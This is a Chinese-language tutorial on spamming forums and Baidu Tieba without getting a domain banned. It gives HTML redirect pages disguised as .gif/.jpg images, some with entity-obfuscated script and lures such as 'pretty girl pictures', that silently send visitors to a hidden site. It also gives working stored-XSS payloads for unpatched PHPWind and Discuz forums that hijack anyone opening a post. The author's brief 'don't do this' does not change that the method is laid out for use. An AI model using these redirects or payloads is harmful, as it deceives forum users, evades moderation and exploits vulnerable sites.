如果你的竞争对手在贴吧发带你网址的广告，你的域名被贴吧封了怎么办？

怎么有技巧的在各大论坛或贴吧发你的广告而又不会面临被封域名的危险？

怎么才给安全的给网站带来大量流量？

OK，今天我们利用浏览器的相同渲染功能和论坛程序Bug来达到我们的目的。

首先说浏览器的渲染功能，如果你用浏览器打开一个网页，或者图片，如gif,jpg的，那么浏览器就要根据网页内容或图处内容来完成渲染，然后把信息展示出来给你，我们要做的就是利用图片来写html代码来做转向，这样有两个好处：

1.避免被封域名的可能性，因为这样做图片你可以上传的任何地方，如http://hi.baidu.com/XXXX/1.gif;

2.利用图片，而不是直接用域名转向，是出自人们好奇心的考虑，如你在一个论坛上发一个图片链接，说这是美女或者奇人奇事，会有人去点的-;

3.利用图片转向，可以隐藏转向后的地址，相关代码在下面会说到，其实就是用基本的html代码写转向后保存成XXX.gif,或者jpg为扩展名的文件，然后上传到一个地方即可：下面是一个隐藏转向后网址的代码（即转向后仍然显示原图片链接地址），;

可隐藏转向之后的地址

以下为引用的内容： <html> <head> <meta http-equiv="Content-Language" content="zh-CN"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312"> <title></title> </head> <frameset framespacing="0" border="0" rows="0" frameborder="0"> <frame name="main" src="将这里改成要转入的网址" scrolling="auto" noresize> </frameset> </html>

不隐藏转向之后的地址

以下为引用的内容： <html> <head> <meta http-equiv="Content-Language" content="zh-CN"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312"> <title></title> </head> <body> <meta http-equiv="refresh" content="0.1;url=将这里改成要转入的网址"> </body> </html>

不隐藏转向之后的地址二

以下为引用的内容： <html> <head> <meta http-equiv="Content-Language" content="zh-cn"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312"> <title></title> </head> <body> <form name=loading> <P align=center><FONT face=Arial color=#0066ff size=2>loading...</FONT> <INPUT style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; FONT-WEIGHT: bolder; PADDING-BOTTOM: 0px; COLOR: #0066ff; BORDER-TOP-style: none; PADDING-TOP: 0px; FONT-FAMILY: Arial; BORDER-RIGHT-style: none; BORDER-LEFT-style: none; BACKGROUND-COLOR: white; BORDER-BOTTOM-style: none" size=46 name=chart> <BR><INPUT style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; COLOR: #0066ff; BORDER-BOTTOM: medium none; TEXT-ALIGN: center" size=47 name=percent> <SCRIPT> var bar=0 var line="||" var amount="||" count() function count(){ bar=bar+2 amount =amount + line document.loading.chart.＆#118alue=amount document.loading.percent.＆#118alue=bar+"%" if (bar<99) {setTimeout("count()",100);} else {window.location = "将这里改成要转入的网址";} }</SCRIPT> </P></form> </body> </html>

不隐藏转向之后的地址三

以下为引用的内容： <html> <body> <script language="＆#106avascript"> <!-- function goToURL() { //v2.0 for (var i=0; i< (goToURL.arguments.length - 1); i+=2) //with arg pairs eval(goToURL.arguments+".location=’"+goToURL.arguments[i+1]+"’"); document.return＆#118alue = false; } //--> </script> <body bgcolor="#FFFFFF" onLoad="goToURL(’parent’,’将这里改成要转入的网址’);return document.return＆#118alue"> </body> </html>

说完了这个，给大家一个演示：www.qmpp.cn/1.gif,打开看一下是不是跳转到了www.apptree.cn 好玩儿吧;

下面来说利用DZ或者PW最近的跨站漏洞来实现自己发的贴子网页转向,这方法感觉不是太好，仅说明一下，不要去做：

这个是跨站的代码及简单的简介，只对未打跨站补丁的论坛有效;

PW论坛的FONT FACE字体没过滤，跨站代码，以下是代码片段：[font=expression(alert(’XSS’))]xss[/font]

DZ论坛的float浮动属性没过滤，跨站代码，以下是代码片段：[float=expression(alert(’XSS’))]xss[/float];

至于怎么用，就是加参数，使其转向，比较简单，发主题贴时用代码模式编辑，然后发贴即可

如：我们在某个大论坛发一个贴子：美女图片，然后在代码模式下写上如下代码：[float=expression(window.location="http://www.zhanzhangzhangbianjiguozhetiaowenzhang.com")]可更改部分[/float]，打开这个贴子后，就会转向http://www.apptochin-az.com，好了，这个方法不太好，大家不要做了，按第一个方法图片转向就挺不错，去试一下吧！